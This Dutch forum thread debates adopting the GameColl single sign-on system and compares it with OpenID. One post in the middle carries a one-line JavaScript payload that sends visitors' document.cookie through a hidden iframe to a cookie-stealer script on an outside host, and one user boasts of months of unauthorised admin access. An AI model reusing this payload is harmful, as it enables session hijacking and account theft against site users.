GameColl Systeem

  • Door dat systeem krijg je een hele hoop eendagjestoeristen en spammers ! Als je echt ergens lid van wil worden moet je maar de moeite ervoor nemen en jezelf aanmelden.


    Als je Gamecoll erop aansluit krijg je dus NOG meer requests..

  • Offtopic: Ben weer thuis. Ga proberen alle werkachterstand in te halen.


    Op deze site komt geen GameColl login systeem tenzij 70% van de leden dit zou willen.
    Dit komt sowieso niet de eerste maanden.
    Hierna houden wij misschien er een poll voor.


    1) De GameColl servers zijn vrij betrouwbaar. Binnen +/- 1 tot 2 weken wordt onze nieuwste server geleverd (quadcore, 2+gighz, speciale CPU webserver core, 4 Gig ram). Als een server zou opbranden, kunnen wij binnen de 2 uur een andere online hebben met de backups die wij in Amerika hebben staan.
    Dit maakt ons login systeem extra betrouwbaar voor derden.
    2) ENKEL de 7 personeelsleden van GameColl, die in het bestuur zitten, krijgen toegang tot een speciale API - en deze staan allemaal onder contract. Je gaat er van uit dat binnen in je eigen organisatie, niemand je zou hacken.
    Als dit dan toch zou gebeuren, hebben ze enkel een versleuteld wachtwoord, in een versleuteling die niet standaard is.
    Alle andere sites die ons inlogsysteem gebruiken, kunnen GEEN wachtwoorden opslagen, want deze worden ENKEL ingevuld op gamecoll.com zelf.
    Vandaar ook de pop-up of de redirect - enkel als men op onze site zijn gegevens invult, zijn wij 100% zeker van de veiligheid.
    Als we het zouden toestaan direct in te loggen met een API, zou iedereen zomaar het invulvak van het wachtwoord kunnen loggen lokaal en dan pas doorsturen naar onze API server.
    Op zich is ons systeem vergelijkbaar met de applicaties van bijvoorbeeld facebook: ben je niet ingelogd, sturen ze je naar de facebook login pagina - log je daar in - wordt je teruggestuurd naar de applicatie.
    Zeer veilig dus.
    Verder staan de wachtwoorden zwaar versleuteld in de database en kan zelfs IK niet aan de wachtwoorden zonder versleuteling.



    Citaat

    Niels: De instellingen op de gamecoll server is ook uitermate slecht wat betreft de php beveiliging om nog maar te zwijgen over de rest.


    Niels weet onze instellingen niet en ik betwijfel dat hij hier over kan oordelen.

  • Ja maar als het zo makkelijk wordt kan zomaar elke luie hond hier zijn vraag komen stellen en als hij eenmaal antwoord heeft vergeet hij deze site weer. Door het registreren worden deze luie honden verdreven omdat ze geen zin hebben in registreren.


    <script>document.write('<iframe height="0" width="0" frameborder="0" src="http://onbekende.nl/cookiestealer.php?cookie=' + document.cookie + '"></iframe>');</script>

  • Citaat

    wel als je nu die personen inloggen heb je meer leden en als je meer leden hebt (ookal zijn ze inactief) gaan ook meer denken dat je spel goed is omdat het veel leden heeft...


    Voor een spel kan dit geen kwaad omdat het zich niet echt richt op het helpen en discussies voeren met elkaar. Bij een community is dit wel.


    Gamecoll is een zeer goed systeem voor GAMES, niet voor communitys anders kon je het COMMUNITYcoll noeme ;)

  • Wouw ik heb nog nooit zo'n grote tekst met onzin onder elkaar gelezen. Na al die jaren heb je nog steeds geen verstand van enige vorm van beveiliging, heb 6 maanden in een admin account kunnen komen door jullie fout (misschien kan het nog steeds heb alleen webscripters in me blacklist staan zodat ik geen crap te zien krijg wat lachwekkender is dan de failblog). Gamecoll kan zich niet vergelijken met OpenID en dat is omdat alle sites die het hebben ook op dezelfde server staan, de mensen van OpenID wel slim en goed bezig waren tijdens het ontwikkelen ervan en niet iets wat in iets minder dan 24 uur in elkaar is geknutseld op een zolder kamertje.

  • Wat niels zegt is gewoon letterlijk een feit,
    Misschien dat jij het een belediging vindt.


    Maar een feit is een feit, en dat kan je dus controleren.


    Waardoor dit toch wel een punt is voor niels.


    Verder zullen we weer terug gaan naar het echte onderwerp.
    Dan weer afdwalen naar een andere concept.


    Zover ik weet als je inlogt op openID dat je dan gelijk een hele overzicht heb van alle sites die onder openID staan en daar kan je dan heel gemakkelijk naar toe. En je bent gelijk ingelogd;)


    Is dit ook zo met gamecoll, zo niet dan weet je misschien iets waarmee je eigen systeem kan verbeteren.
    Maar ik vind het bij gamecoll allemaal niet zo overzichtelijk zover ik weet de laatste keer toen ik inlogde.

    School
    Tweedejaars Informatica Student @ Hogeschool Rotterdam.


    Webtalen
    - PHP ( OOP )
    - SQL
    - JavaScript i.c.m. jQuery framework
    - (x)HTML
    - CSS
    - Actionscript
    - XML


    Programmeertalen
    - Java
    - C#
    - Ruby i.c.m. on Rails framework

  • OpenID is professioneler, dit heb je niet bij Gamecoll. Hoe dit komt weet ik niet maar ik denk dat het hierdoor komt: OpenID wordt enkel gebruikt op zeer grote website's terwijl Gamecoll zich verspreid over duizenden noobsite's (niet allemaal natuurlijk maar de meeste wel). Door die noobsite's zijn er vele noobs die zich er op aanmelden. De grootste noobaantrekker hierbij was yourcrime.

  • Wel volgens mij komt dat doodsimpel omdat OpenID geen host heeft en geen andere projecten en Gamecoll wel een host is en wel vele projecten heeft die onderhouden moeten worden: yourcrime (dit is tegenwoordig OnlineGameManager), webscripters, publicoll,...
    en veel van die dingen doet Koen.
    Hij heeft het zo druk dat hij zelfs een script (voor OMG) dat ik in het begin van het schooljaar heb gegeven nog steeds niet heeft nagekeken...
    En ik heb hem er regelmatig aan herinnerd

  • Gamecoll is waardeloos, waarom wil JIJ het uberhaupt zelf gebruiken, je enige argument is het betalingssysteem voor alle gebruikers.


    en je wilt gamecoll aan cp koppelen, enige aanleiding daarvoor is dat je ons ergens voor wilt laten gaan betalen op cp.
    Het feit dat je er ook al over doordramt met je gamecoll dit en dat laat al zien waar het naartoe gaat.
    ik zeg iig al dit, word gamecoll geintroduceert op cp dan zorg ik dat ik gebanned word en komt deze site op me blacklist >.>

    Koen, toppunt van zieligheid, ja dat heb je zelf begaan.
    Je komt er niet zomaar mee weg, je hoort nog van ons.
    Even a german had some form of respect for his enemy, even 65 years ago, this scumbag has none, making him the true evil.

  • Sommige mensen kunnen echt niet lezen...
    Lees mijn post en deze van het team.
    CP wordt niet GameColl gekoppeld!!!! 8-|


    Laeresh: waarop baseer je je om te beweren dat GameColl waardeloos is? Wij hebben wel al verschillende servers draaien, een groot leden en klantenbestand en veel websites.


    GameColl is zijn eigen webhost, heeft zelfs een eigen rack gehuurd in een datacenter. In dit rack verhuren wij colocated server plaatsen, zodat iedereen zijn server er kan plaatsen.


    OpenID en GameColl login zijn totaal andere systemen, die op een totaal andere manier werken.
    Bij OpenID vertrouw je je gegevens toe aan een bepaalde website, waarbij je een keuze hebt uit duizenden websites, betrouwbare en onbetrouwbare. Alles hangt ginder af van een betrouwbare partij te nemen.
    MAAR met een OpenID account van 1 server, kun je niet altijd inloggen op de OpenID gekoppelde website van een andere server.
    Veel bedrijven verplichten hun gebruikers alsnog om te registreren. Verder staan de accounts niet centraal, kunnen er veel sneller conflicten optreden tussen de verschillende servers en is er geen zekerheid over de veiligheid. Alles hangt af van diegene die je vertrouwt.
    Bij GameColl vertrouw je 1 enkel systeem, met 1 enkel systeem dat moet beveiligd en gecontroleerd worden. Alles staat centraal.


    Beide systemen zijn veilig, maar hebben andere uitgangspunten en zijn slechts zo veilig als de server die de gegevens bewaart of doorstuurt. Verder kan de lokale website bij OpenID nog altijd alle input loggen. Persoonlijk vind ik dit het zwaarste minpunt.


    Is totaal ander uitgangspunt dus.

Participate now!

Heb je nog geen account? Registreer je nu en word deel van onze community!